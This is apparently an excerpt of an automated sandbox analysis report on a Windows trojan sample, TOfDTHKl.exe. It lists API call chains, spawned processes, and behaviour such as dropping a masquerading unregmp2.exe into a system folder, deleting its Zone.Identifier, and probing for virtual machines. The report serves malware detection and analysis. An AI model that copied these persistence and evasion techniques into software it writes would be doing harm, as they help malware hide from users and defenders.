                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0205929E
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02055AA5
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_020556BE
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02059ACE
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0205814E
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0205E15B
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0205E3BA
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_020537FE
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exe Code function: 3_2_004034C1
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exe Code function: 3_2_00403AE8
                Source: TOfDTHKl.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exe, 00000001.00000002.206166023.0000000002700000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs TOfDTHKl.exe
                Source: TOfDTHKl.exe, 00000001.00000002.206276366.0000000002760000.00000002.00000001.sdmp Binary or memory string: originalfilename vs TOfDTHKl.exe
                Source: TOfDTHKl.exe, 00000001.00000002.206276366.0000000002760000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs TOfDTHKl.exe
                Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
                Source: classification engine Classification label: mal76.troj.evad.winEXE@18/8@0/3
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02088840 CloseServiceHandle,_snwprintf,CreateServiceW,OpenSCManagerW,OpenSCManagerW,CloseServiceHandle
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085070 QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,EnumServicesStatusExW,GetTickCount,OpenServiceW,OpenServiceW,ChangeServiceConfig2W,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree
                Source: C:\Users\user\Desktop\TOfDTHKl.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
                Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6396:120:WilError_01
                Source: TOfDTHKl.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\TOfDTHKl.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: TOfDTHKl.exe Virustotal: Detection: 10%
                Source: TOfDTHKl.exe ReversingLabs: Detection: 12%
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknown Process created: C:\Users\user\Desktop\TOfDTHKl.exe 'C:\Users\user\Desktop\TOfDTHKl.exe'
                Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknown Process created: C:\Windows\SysWOW64\Faultrep\unregmp2.exe C:\Windows\SysWOW64\Faultrep\unregmp2.exe
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Process created: C:\Windows\SysWOW64\Faultrep\unregmp2.exe C:\Windows\SysWOW64\Faultrep\unregmp2.exe
                Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: TOfDTHKl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: awWindow.pdb source: TOfDTHKl.exe
                Source: Binary string: c:\Users\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdbPA source: TOfDTHKl.exe
                Source: Binary string: ctures\111\drawwindow_src\Release\DrawWindow.pdb source: TOfDTHKl.exe
                Source: Binary string: c:\Users\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdb source: TOfDTHKl.exe
                Source: Binary string: sers\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdb source: TOfDTHKl.exe
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0040BD50 LoadLibraryW,GetProcAddress
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_00403AD7 push ecx; ret 1_2_00403AE7
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_00404CA0 push eax; ret 1_2_00404CB4
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_00404CA0 push eax; ret 1_2_00404CDC
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_00402BF8 push eax; ret 1_2_00402C16
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085E10 push ecx; mov dword ptr [esp], 00006163h 1_2_02085E11
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02086030 push ecx; mov dword ptr [esp], 00002DB0h 1_2_02086031
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085E60 push ecx; mov dword ptr [esp], 0000FB39h 1_2_02085E61
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02086080 push ecx; mov dword ptr [esp], 000093C3h 1_2_02086081
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085EA0 push ecx; mov dword ptr [esp], 0000B3C5h 1_2_02085EA1
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085EC0 push ecx; mov dword ptr [esp], 0000C070h 1_2_02085EC1
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085F20 push ecx; mov dword ptr [esp], 00003106h 1_2_02085F21
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085F40 push ecx; mov dword ptr [esp], 0000A80Dh 1_2_02085F41
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085F80 push ecx; mov dword ptr [esp], 0000FC88h 1_2_02085F81
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085DC0 push ecx; mov dword ptr [esp], 00009C10h 1_2_02085DC1
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085FE0 push ecx; mov dword ptr [esp], 0000CC57h 1_2_02085FE1
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02057C1E push ecx; mov dword ptr [esp], 000093C3h 1_2_02057C1F
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02058C1E push edi; ret 1_2_02058C24
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02057A3E push ecx; mov dword ptr [esp], 0000B3C5h 1_2_02057A3F
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02057A5E push ecx; mov dword ptr [esp], 0000C070h 1_2_02057A5F
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02057ABE push ecx; mov dword ptr [esp], 00003106h 1_2_02057ABF
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02057ADE push ecx; mov dword ptr [esp], 0000A80Dh 1_2_02057ADF
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0205DAF5 push ss; ret 1_2_0205DB22
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0205D71C push FFFFFFB9h; iretd 1_2_0205D731
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02057B1E push ecx; mov dword ptr [esp], 0000FC88h 1_2_02057B1F
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0205795E push ecx; mov dword ptr [esp], 00009C10h 1_2_0205795F
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02057B7E push ecx; mov dword ptr [esp], 0000CC57h 1_2_02057B7F
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_020579AE push ecx; mov dword ptr [esp], 00006163h 1_2_020579AF
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02057BCE push ecx; mov dword ptr [esp], 00002DB0h 1_2_02057BCF
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_020579FE push ecx; mov dword ptr [esp], 0000FB39h 1_2_020579FF
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exe Code function: 3_2_00403AD7 push ecx; ret 3_2_00403AE7
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exe Code function: 3_2_00404CA0 push eax; ret 3_2_00404CB4

                Persistence and Installation Behavior:

                Drops executables to the windows directory (C:\Windows) and starts them
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Executable created and started: C:\Windows\SysWOW64\Faultrep\unregmp2.exe
                Source: C:\Users\user\Desktop\TOfDTHKl.exe PE file moved: C:\Windows\SysWOW64\Faultrep\unregmp2.exe

                Hooking and other Techniques for Hiding and Protection:

                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\TOfDTHKl.exe File opened: C:\Windows\SysWOW64\Faultrep\unregmp2.exe:Zone.Identifier read attributes | delete
                Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TOfDTHKl.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02085070 QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,EnumServicesStatusExW,GetTickCount,OpenServiceW,OpenServiceW,ChangeServiceConfig2W,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree
                Source: C:\Windows\System32\svchost.exe TID: 6216 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6328 Thread sleep time: -210000s >= -30000s
                Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\TOfDTHKl.exe File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02083810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_00407513 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect
                Source: svchost.exe, 00000002.00000002.473311819.00000217CD340000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.265571806.0000029D40F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.280237757.000001F7DCD40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.341483269.000001CA74940000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.373468554.0000026967000000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000008.00000002.475677078.000002179C25E000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
                Source: svchost.exe, 00000000.00000002.471745678.00000292AAE02000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: unregmp2.exe, 00000003.00000002.475337385.0000000002A1C000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.471662434.0000021796C24000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.372060116.0000026966282000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000002.00000002.473311819.00000217CD340000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.265571806.0000029D40F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.280237757.000001F7DCD40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.341483269.000001CA74940000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.373468554.0000026967000000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000002.00000002.473311819.00000217CD340000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.265571806.0000029D40F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.280237757.000001F7DCD40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.341483269.000001CA74940000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.373468554.0000026967000000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: unregmp2.exe, 00000003.00000002.475237596.0000000002A10000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000012.00000002.372209835.00000269662E3000.00000004.00000001.sdmp Binary or memory string: Paramet$@Hyper-V RAWs\{BB556C50-98D0-4585-A1ED-B2838757AE1B}
                Source: svchost.exe, 00000000.00000002.471840960.00000292AAE28000.00000004.00000001.sdmp, svchost.exe, 00000002.00000002.471311602.00000217CC66C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.471991814.000002AD15A2A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000002.00000002.473311819.00000217CD340000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.265571806.0000029D40F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.280237757.000001F7DCD40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.341483269.000001CA74940000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.373468554.0000026967000000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0040BD50 LoadLibraryW,GetProcAddress
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02084E20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02083EE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02050456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02055A7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0205095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_020569BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02061030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_02083810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0040568A SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_0040569E SetUnhandledExceptionFilter
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exe Code function: 3_2_0040568A SetUnhandledExceptionFilter
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exe Code function: 3_2_0040569E SetUnhandledExceptionFilter
                Source: unregmp2.exe, 00000003.00000002.472321916.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.472132576.000002071B790000.00000002.00000001.sdmp Binary or memory string: Program Manager
                Source: unregmp2.exe, 00000003.00000002.472321916.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.472132576.000002071B790000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                Source: unregmp2.exe, 00000003.00000002.472321916.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.472132576.000002071B790000.00000002.00000001.sdmp Binary or memory string: Progman
                Source: unregmp2.exe, 00000003.00000002.472321916.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.472132576.000002071B790000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\TOfDTHKl.exe Code function: 1_2_00407307 GetLocaleInfoA
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exe Code function: 3_2_00407307 GetLocaleInfoA
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQu